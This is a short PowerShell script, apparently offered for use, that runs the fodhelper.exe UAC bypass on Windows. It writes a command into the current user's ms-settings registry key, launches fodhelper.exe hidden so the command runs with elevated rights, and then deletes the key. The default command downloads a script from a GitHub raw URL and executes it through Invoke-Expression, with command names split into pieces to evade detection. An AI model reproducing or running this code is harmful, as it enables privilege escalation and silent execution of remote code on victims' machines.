function Fodhelper(){ 
 Param (
           
        [String]$program = "C:\Windows\System32\conhost.exe --headless powershell -exec Bypass -c `"`$l='http'+'s://raw.githubusercontent.com/jabdotNet/tests/main/x1.ps3';(i''wR -UseBasicParsing `$l).content|i''E''x`" 
       )
　
    #Create Registry Structure
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
　
    #Start fodhelper.exe
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
　
    #Cleanup
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
　
}

Fodhelper
